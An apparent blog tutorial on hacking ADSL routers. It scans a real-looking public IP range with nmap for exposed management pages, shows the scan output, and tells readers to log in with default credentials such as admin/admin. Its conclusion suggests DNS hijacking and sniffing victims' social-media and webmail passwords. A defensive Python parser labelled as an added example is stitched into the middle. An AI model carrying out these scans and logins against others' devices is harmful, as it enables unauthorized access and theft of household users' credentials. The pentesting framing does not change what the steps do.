
Router Hack – How to Hack ADSL Router Using NMAP

An asymmetric digital subscriber line (DSL or ADSL) modem is a device used to connect a computer or router to a telephone line which provides the digital subscriber line service for connectivity to the Internet, which is often called DSL or ADSL broadband. In this guide I will show you how to scan an IP range for connected ADSL or DSL modem routers and find DSL or ADSL routers whose management interface is reachable remotely. This guide applies to Windows, Linux or Mac, so it doesn't matter what your operating system is, you can try the same steps from all these operating systems. The term DSL or ADSL modem is technically used to describe a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot. The more common DSL or ADSL router, which combines the function of a DSL or ADSL modem and a home router, is a standalone device which can be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called a residential gateway, a DSL or ADSL router usually manages the connection and sharing of the DSL or ADSL service in a home or small office network.


Put this together with Wireshark hacking for http websites, and you've got a nightmare for the user behind that router, as all their passwords and details can be tracked very easily.




What’s in a DSL ADSL Router?


A DSL or ADSL router consists of a box which has an RJ11 jack to connect to a standard subscriber telephone line. It has several RJ45 jacks for Ethernet cables to connect it to computers or printers, creating a local network. It usually also has a USB jack which can be used to connect to computers via a USB cable, to allow connection to computers without an Ethernet port. A wireless DSL or ADSL router also has antennas to allow it to act as a wireless access point, so computers can connect to it forming a wireless network. Power is usually supplied by a cord from a wall wart transformer. It usually has a series of LED status lights which show the status of parts of the DSL or ADSL communications link:



  1. Power light – indicates that the modem is turned on and has power.

  2. Ethernet lights – There is usually a light over each Ethernet jack. A steady (or sometimes flashing) light indicates that the Ethernet link to that computer or device is functioning

  3. DSL or ADSL light – a steady light indicates that the modem has established contact with the equipment in the local exchange (DSLAM) so the DSL or ADSL link over the telephone line is functioning

  4. Internet light – a steady light indicates that the IP address and DHCP protocol are initialized and working, so the system is connected to the Internet

  5. Wireless light – only in wireless DSL or ADSL modems, this indicates that the wireless network is initialized and working


Almost every ADSL DSL modem router provides a management web page available via the internal network (LAN or local area network) for device management, configuration and status reporting. You are supposed to log in to the management web page and configure a username and password combination provided by your Internet service provider (ISP), which then allows you to connect to the internet. The network is divided into two parts:


External Network


External network indicates the part where ADSL DSL modem routers connect to the upstream provider for internet connectivity. Once connected to the ISP via a phone line (ADSL DSL modem routers can use conventional copper phone lines to connect to the ISP at a much higher speed), the router gets an IP address. This is usually a publicly routable IP address which is open to the whole world.


Internal Network


Internal network indicates the part where devices in the local area network connect to the ADSL DSL modem router via either wireless or Ethernet cable. Most modern DSL ADSL modem routers run a DHCP server internally which assigns an internal IP address to the connected device. When I say device, this can be anything from a conventional computer, a laptop, a phone (Android, Apple, Nokia or Blackberry etc.), a smart TV, a car, NAS, SAN, an orange, a banana, a cow, a dragon, Harry Potter … I mean anything that’s able to connect to the internet! So you get the idea. Each device gets its own IP address, a gateway IP and DNS entries. Depending on the DSL ADSL modem router, this can be slightly different, but the idea remains the same: the DSL ADSL router allows users to share internet connectivity. These DSL ADSL modem routers are like miniature gateway devices that can have many services running on them. Usually they all use BusyBox or similar proprietary Linux applications on them. You want to know what a DSL ADSL router can do? Here’s a list of common services that can run on a DSL ADSL modem router:



  1. ADSL2 and/or ADSL2+ support

  2. Antenna/ae (wireless)

  3. Bridge/Half-bridge mode

  4. Cookie blocking

  5. DHCP server

  6. DDNS support

  7. DoS protection

  8. Switching

  9. Intrusion detection

  10. LAN port rate limiting

  11. Inbuilt firewall

  12. Inbuilt or Free micro-filter

  13. Java/ActiveX applet blocking

  14. Javascript blocking

  15. MAC address filtering

  16. Multiple public IP address binding

  17. NAT

  18. Packet filter

  19. Port forwarding/port range forwarding

  20. POP mail checking

  21. QoS (especially useful for VoIP applications)

  22. RIP-1/RIP-2

  23. SNTP facility

  24. SPI firewall

  25. Static routing

  26. So-called “DMZ” facility

  27. RFC1483 (bridged/routed)

  28. IPoA

  29. PPPoE

  30. PPPoA

  31. Embedded PPPoX login clients

  32. Parental controls

  33. Print server inbuilt

  34. Scheduling by time/day of week

  35. USB print server

  36. URL blocking facility

  37. UPnP facility

  38. VPN pass-through

  39. Embedded VPN servers

  40. WEP 64/128/256 bit (wireless security)

  41. WPA (wireless security)

  42. WPA-PSK (wireless security)


That’s a lot of services running on a small device that are configured by nanny, granny, uncle, aunt and the next door neighbour, in short many non-technical people around the world. How many of those are configured badly? Left ports open left, right and center? Didn’t change default admin passwords? Many! I mean MANY! In this guide we will use nmap to scan a range of IP addresses, and from the output we will determine which are DSL ADSL routers that have left their management ports open to the external network (again, read the section above to know which one is the external network). A typical ADSL router’s management interface is available via the following URLs:


http://10.0.0.1/

http://192.168.0.1/

http://192.168.1.1/

http://192.168.1.254/
etc.

This is the management page for the DSL ADSL modem router and it’s always protected by a password. By default, this password is written on a sticker underneath the DSL ADSL modem router and is one of these combinations (username/password):


admin/admin
admin/password
admin/pass
admin/secret
etc.

A lot of home users don’t change this password. Well, that’s ok. It doesn’t hurt much because this is only available via a connected device. But what’s not OKAY is when users open up their management to the external network. All you need to know is the public IP address of your target and then simply try to access this management page externally.


Installing NMAP


I use Kali Linux which comes with NMAP preinstalled. If you are using Windows or Mac (or any other flavor of Linux) go to the following website to download and install NMAP.


Linux Installation:


For Ubuntu, Debian or aptitude based systems NMAP is usually made available via the default repository. Install NMAP using the following command:


sudo apt-get install nmap

For YUM based systems such as Redhat, CentOS, install via


sudo yum install nmap

For PACMAN based systems such as Arch Linux, install via


sudo pacman -S nmap

Windows Installation:


For Windows computers, download the installer and run the executable. Link: http://nmap.org/dist/nmap-6.46-setup.exe


Mac Installation:


For Mac users, download the installer and install it. Link: http://nmap.org/dist/nmap-6.46.dmg


Official NMAP site


You can read more about NMAP here: http://nmap.org/


Search for Vulnerable Routers


Now that we have NMAP sorted, we are going to run the following command to scan for ADSL modem routers based on their banner on port 80 to start our ADSL router hack. All you need is to pick an IP range. I’ve used an example below using the 101.53.64.1/24 range.


Search from Linux using command Line


In Linux run the following command:


nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'



In Windows or Mac open NMAP and copy and paste this line:


nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -

Once it finds the results, search for the word ‘open’ to narrow down the results. A typical Linux NMAP command would return output like below (and of course I’ve changed the IP details):


Host: 101.53.64.3 ()  Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.4 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.9 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.19 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.20 () Ports: 80/open/tcp//http//Fortinet VPN|firewall http config/
Host: 101.53.64.23 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.31 () Ports: 80/open/tcp//http?///
Host: 101.53.64.33 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.35 () Ports: 80/open/tcp//http?///
Host: 101.53.64.37 () Ports: 80/open/tcp//http?///
Host: 101.53.64.49 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.52 () Ports: 80/open/tcp//http?///
Host: 101.53.64.53 () Ports: 80/open/tcp//ssl|http//thttpd/
Host: 101.53.64.58 () Ports: 80/open/tcp//http?///
Host: 101.53.64.63 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.69 () Ports: 80/open/tcp//http//Gadspot|Avtech AV787 webcam http config/
Host: 101.53.64.73 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.79 () Ports: 80/open/tcp//http//Apache httpd/
Host: 101.53.64.85 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.107 () Ports: 80/open/tcp//http?///
Host: 101.53.64.112 () Ports: 80/open/tcp//http?///
Host: 101.53.64.115 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.123 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.129 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.135 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.145 () Ports: 80/open/tcp//http//micro_httpd/
Host: 101.53.64.149 () Ports: 80/open/tcp//http//Microsoft IIS httpd 6.0/
Host: 101.53.64.167 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.170 () Ports: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/
Host: 101.53.64.186 () Ports: 80/open/tcp//http?///
Host: 101.53.64.188 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.193 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.202 () Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
Host: 101.53.64.214 () Ports: 80/open/tcp//tcpwrapped///
Host: 101.53.64.224 () Ports: 80/open/tcp//http//Allegro RomPager 4.51 UPnP|1.0 (ZyXEL ZyWALL 2)/

This was taking a long time (we are after all trying to scan 256 hosts using the command above). Me being just impatient, I wanted to check if my Kali Linux was actually doing anything to ADSL router hack. I used the following command in a separate terminal to monitor what my PC was doing… it was doing a lot …


tcpdump -ni eth0



That’s a lot of connected hosts with TCP port 80 open. Some got ‘tcpwrapped’ marked on them. It means they are possibly not accessible.


Search from Windows, Mac or Linux using GUI – NMAP or Zenmap


Assuming you got the NMAP installation sorted, you can now open NMAP (in Kali Linux or a similar Linux distro, you can use Zenmap, which is the cross-platform GUI version of NMAP). Copy and paste the following line in the Command field:


nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/26 -p80 -oG -

Another version of this command uses a different representation of the subnet mask.


nmap -sS -sV -vv -n -Pn -T5 101.53.64.1-255 -p80 -oG -

Press the SCAN button and wait a few minutes till the scan is over.




Once you have some results, you then need to find the open devices with open ports. In the search result page:



  1. Click on Services Button

  2. Click on http Service

  3. Click on Ports/Hosts TAB (twice to sort them by status)


As you can see, I’ve found a few devices with open http port 80.




It is quite amazing how many devices got ports open facing the outer DMZ.


Access Management Webpage


Pick one at a time. For example try this:


http://101.53.64.3

http://101.53.64.4

http://101.53.64.129



You get the idea. If it opens a webpage asking for username and password, try one of the following combinations:


admin/admin
admin/password
admin/pass
admin/secret

If you can find the router’s model number and make, you can find the exact username and password from this webpage: http://portforward.com/default_username_password/

Before we finish up, I am sure you were already impatient like me, as a lot of the routers had ‘tcpwrapped’ on them which was actually stopping us from accessing the web management interface to ADSL router hack. The following command will exclude those devices from our search. I’ve also expanded my search to a broader range using a slightly different subnet mask.


nmap -sS -sV -vv -n -Pn -T5 101.53.64.1/22 -p80 -oG - | grep 'open' | grep -v 'tcpwrapped'

In this command I am using a /22 subnet mask with 2 specific outputs: I am looking for the word ‘open’ and excluding ‘tcpwrapped’ on my output. As you can see, I still get a lot of outputs.
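An added example, not part of the original guide: when reviewing a scan of your own address range, parsing the grepable (-oG) output field by field avoids two weaknesses of the grep pipeline above, namely that grep 'open' matches the word anywhere on the line and that grep -v 'tcpwrapped' drops a whole host line as soon as one of its ports is tcpwrapped. The sample lines, the documentation addresses and the EMBEDDED_HINTS list are constructed for illustration.

```python
import re

# Constructed sample of `nmap -oG -` output (documentation addresses, not real hosts).
SAMPLE = """\
# Nmap scan initiated (constructed sample)
Host: 192.0.2.3 ()\tStatus: Up
Host: 192.0.2.3 ()\tPorts: 80/open/tcp//tcpwrapped///
Host: 192.0.2.4 ()\tPorts: 80/open/tcp//http//micro_httpd/
Host: 192.0.2.9 ()\tPorts: 80/closed/tcp//http///
Host: 192.0.2.20 ()\tPorts: 80/open/tcp//http//Allegro RomPager 4.07 UPnP|1.0 (ZyXEL ZyWALL 2)/, 443/open/tcp//tcpwrapped///
Host: 192.0.2.31 () Ports: 80/open/tcp//http?///
Host: 192.0.2.79 () Ports: 80/open/tcp//http//Apache httpd 2.2.15 ((CentOS))/
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(.*?\)\s+Ports:\s+(.*)$")
# One port entry: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/([^/]*)/([^/]*)/[^/]*/([^/]*)/[^/]*/([^/]*)/")
# Assumption: banner substrings taken from the sample output shown in this guide.
EMBEDDED_HINTS = ("micro_httpd", "RomPager", "http config")


def parse_grepable(text):
    """Yield (host, port, state, service, version) for every port entry."""
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comments and "Status:" lines carry no port data
        # Real output separates sections with tabs; keep only the Ports section.
        host, ports = m.group(1), m.group(2).split("\t")[0]
        for p in PORT_RE.finditer(ports):
            port, state, _proto, service, version = p.groups()
            yield host, int(port), state, service, version


def exposed_management(text, port=80):
    """Map host -> (kind, banner) where `port` is open and not tcpwrapped."""
    findings = {}
    for host, pnum, state, service, version in parse_grepable(text):
        if pnum != port or state != "open" or service == "tcpwrapped":
            continue  # judged per port, so a wrapped 443 does not hide an open 80
        embedded = any(hint in version for hint in EMBEDDED_HINTS)
        findings[host] = ("embedded-device UI" if embedded else "web service", version)
    return findings


if __name__ == "__main__":
    for host, (kind, banner) in exposed_management(SAMPLE).items():
        print(f"{host}\t{kind}\t{banner or '(no banner)'}")
```

Any host of your own that shows up here is answering HTTP on its WAN side; on a home router the usual fix is to turn off remote management and change the default admin password.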




Conclusion


You’ll be surprised how many have default usernames and passwords enabled. Once you get your access to the router, you can do a lot more, like DNS hijacking, stealing usernames and passwords (for example: social media usernames and passwords (Facebook, Twitter, WebMail etc.)) using tcpdump/snoop on the router’s interface and many more using ADSL router hack … Why did I write this guide? I get lots of feedback via the Contact Us page. Here’s one for example:



As you can see, Jhefeson likely has a legitimate reason to try and reboot this shared router, but he can’t simply because he doesn’t have physical access to it. If this guide works, he can actually get access back.


There are many things you can do after you’ve got access to a router. You can change DNS settings, set up a tcpdump and later snoop all plaintext passwords using wireshark etc. If you know a friend, family member, colleague or neighbour who didn’t change their router’s default password, let them know of the risks.


But I am not here to judge whether it should be done or not, but this is definitely a way to gain access to a router. So hacking is not always bad, it sometimes is required when you lose access or a system just wouldn’t respond. As a pentester, you should raise awareness. Share this guide, as anyone who uses Linux, Windows or Mac can use this guide to test their own network and fix the ADSL router hack issue.

